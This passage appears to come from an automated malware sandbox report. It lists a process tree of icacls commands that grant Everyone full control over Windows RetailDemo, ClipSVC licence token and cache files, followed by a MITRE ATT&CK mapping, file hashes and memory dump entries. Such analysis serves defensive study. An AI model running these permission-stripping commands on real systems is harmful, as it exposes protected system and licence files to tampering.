  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:348
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3484
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2608
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoProvisioning.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2108
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3220
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoHub.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2160
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1404
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe_License.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1844
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3600
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4052
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:192
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:228
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2552
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3636
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:636
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3756
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3484
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3220
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:648
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3016
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\109c9870-7988-c77e-8ad0-376ab6e81351.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2680
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1172
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1e225998-faa0-5fd4-4db7-5e7686ee3b47.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2700
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3716
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1600
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\26943e1f-42ed-f190-2895-3bc2b8c4176d.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:348
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1476
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1064
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2a3adcd0-4ddc-f3d2-6bcb-f11f9cbc1e2c.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2180
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3764
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3408
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\41b63f44-ec3b-79f7-4657-c8f0727d1b13.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3756
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:4020
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\517cfcaf-138b-1796-2cea-62892204250a.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2148
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1508
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:580
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\61b5bd89-4cb0-db77-6622-cb63b5a58080.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3996
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3752
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\67447b0c-05cf-6740-5f7b-391ab440c42d.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:768
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3832
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2220
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2904
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3964
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3220
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8292682a-6850-c06c-9b6d-9646f16d4ed0.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:992
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3456
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8ce3d3dd-a4c7-6c38-5fde-1f9f5df98807.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1240
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3140
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3788
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:64
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a7e08b8b-ad4b-af00-ebcc-1aa29a833ce9.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1308
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4056
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3432
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbc7a1c3-44c6-27b6-1e16-487a47263f3e.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:4020
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3404
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1508
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3628
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3148
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1064
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3220
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2496
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e0e43bae-32f3-2aa6-ce7d-e4ee1e84a462.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1128
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3028
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1820
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1996
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3628
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1172
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2904
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3456
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2492
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2100
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4076
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2700
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2300

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
3de1d77ba21b333ca36fc186ce443385

SHA1
edf65551a72b2cf7608630dbedcea1dd4e211da5

SHA256
2c38060e0a14707d92d14ce7ab61a461835a719c4600d36de9aff371e8f52384

SHA512
b360fd1e7b59ffa7b196461aa4c7b2ebc3d6a7474c024afa71baa3fa74dd810570a2624de69492c9eebfd08702f8160eec530dabba5ed058e027f97872ae5261

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
3de1d77ba21b333ca36fc186ce443385

SHA1
edf65551a72b2cf7608630dbedcea1dd4e211da5

SHA256
2c38060e0a14707d92d14ce7ab61a461835a719c4600d36de9aff371e8f52384

SHA512
b360fd1e7b59ffa7b196461aa4c7b2ebc3d6a7474c024afa71baa3fa74dd810570a2624de69492c9eebfd08702f8160eec530dabba5ed058e027f97872ae5261

Download Submit
memory/188-633-0x0000000000000000-mapping.dmp

Download
memory/188-652-0x0000000000000000-mapping.dmp

Download
memory/196-655-0x0000000000000000-mapping.dmp

Download
memory/384-658-0x0000000000000000-mapping.dmp

Download
memory/392-665-0x0000000000000000-mapping.dmp

Download
memory/412-620-0x0000000000000000-mapping.dmp

Download
memory/804-659-0x0000000000000000-mapping.dmp

Download
memory/932-631-0x0000000000000000-mapping.dmp

Download
memory/932-669-0x0000000000000000-mapping.dmp

Download
memory/968-144-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

Filesize
4KB

Download
memory/968-124-0x00000000042F0000-0x00000000042F1000-memory.dmp

Filesize
4KB

Download
memory/968-142-0x00000000042F2000-0x00000000042F3000-memory.dmp

Filesize
4KB

Download
memory/968-118-0x0000000000000000-mapping.dmp

Download
memory/968-140-0x0000000007AC0000-0x0000000007AC1000-memory.dmp

Filesize
4KB

Download
memory/968-588-0x0000000008F60000-0x0000000008F61000-memory.dmp

Filesize
4KB

Download
memory/968-217-0x00000000042F3000-0x00000000042F4000-memory.dmp

Filesize
4KB

Download
memory/968-184-0x000000007ECA0000-0x000000007ECA1000-memory.dmp

Filesize
4KB

Download
memory/968-186-0x0000000008E90000-0x0000000008E91000-memory.dmp

Filesize
4KB

Download
memory/992-674-0x0000000000000000-mapping.dmp

Download
memory/1168-667-0x0000000000000000-mapping.dmp

Download
memory/1172-666-0x0000000000000000-mapping.dmp

Download
memory/1288-678-0x0000000000000000-mapping.dmp

Download
memory/1308-626-0x0000000000000000-mapping.dmp

Download
memory/1396-619-0x0000000000000000-mapping.dmp

Download
memory/1476-645-0x0000000000000000-mapping.dmp

Download
memory/1568-636-0x0000000000000000-mapping.dmp

Download
memory/1768-623-0x0000000000000000-mapping.dmp

Download
memory/1996-639-0x0000000000000000-mapping.dmp

Download
memory/2000-628-0x0000000000000000-mapping.dmp

Download
memory/2012-649-0x0000000000000000-mapping.dmp

Download
memory/2032-622-0x0000000000000000-mapping.dmp

Download
memory/2084-618-0x0000000000000000-mapping.dmp

Download
memory/2108-643-0x0000000000000000-mapping.dmp

Download
memory/2180-647-0x0000000000000000-mapping.dmp

Download
memory/2256-114-0x0000000000B10000-0x0000000000B11000-memory.dmp

Filesize
4KB

Download
memory/2256-117-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/2256-116-0x00000000053C0000-0x00000000053C1000-memory.dmp

Filesize
4KB

Download
memory/2368-642-0x0000000000000000-mapping.dmp

Download
memory/2424-632-0x0000000000000000-mapping.dmp

Download
memory/2496-644-0x0000000000000000-mapping.dmp

Download
memory/2620-675-0x0000000000000000-mapping.dmp

Download
memory/2632-657-0x0000000000000000-mapping.dmp

Download
memory/2668-638-0x0000000000000000-mapping.dmp

Download
memory/2676-188-0x0000000008F10000-0x0000000008F11000-memory.dmp

Filesize
4KB

Download
memory/2676-143-0x00000000040A2000-0x00000000040A3000-memory.dmp

Filesize
4KB

Download
memory/2676-136-0x00000000075D0000-0x00000000075D1000-memory.dmp

Filesize
4KB

Download
memory/2676-132-0x00000000072A0000-0x00000000072A1000-memory.dmp

Filesize
4KB

Download
memory/2676-668-0x0000000000000000-mapping.dmp

Download
memory/2676-119-0x0000000000000000-mapping.dmp

Download
memory/2676-126-0x0000000004170000-0x0000000004171000-memory.dmp

Filesize
4KB

Download
memory/2676-220-0x00000000040A3000-0x00000000040A4000-memory.dmp

Filesize
4KB

Download
memory/2676-138-0x00000000073F0000-0x00000000073F1000-memory.dmp

Filesize
4KB

Download
memory/2676-125-0x00000000040A0000-0x00000000040A1000-memory.dmp

Filesize
4KB

Download
memory/2676-128-0x0000000006C00000-0x0000000006C01000-memory.dmp

Filesize
4KB

Download
memory/2676-161-0x0000000008C10000-0x0000000008C43000-memory.dmp

Filesize
204KB

Download
memory/2676-174-0x0000000008BD0000-0x0000000008BD1000-memory.dmp

Filesize
4KB

Download
memory/2676-185-0x000000007EB40000-0x000000007EB41000-memory.dmp

Filesize
4KB

Download
memory/2676-576-0x0000000008E20000-0x0000000008E21000-memory.dmp

Filesize
4KB

Download
memory/2676-130-0x0000000006BA0000-0x0000000006BA1000-memory.dmp

Filesize
4KB

Download
memory/2692-676-0x0000000000000000-mapping.dmp

Download
memory/2700-621-0x0000000000000000-mapping.dmp

Download
memory/2728-673-0x0000000000000000-mapping.dmp

Download
memory/2736-656-0x0000000000000000-mapping.dmp

Download
memory/2760-664-0x0000000000000000-mapping.dmp

Download
memory/2904-670-0x0000000000000000-mapping.dmp

Download
memory/2932-630-0x0000000000000000-mapping.dmp

Download
memory/3016-637-0x0000000000000000-mapping.dmp

Download
memory/3024-646-0x0000000000000000-mapping.dmp

Download
memory/3124-648-0x0000000000000000-mapping.dmp

Download
memory/3140-661-0x0000000000000000-mapping.dmp

Download
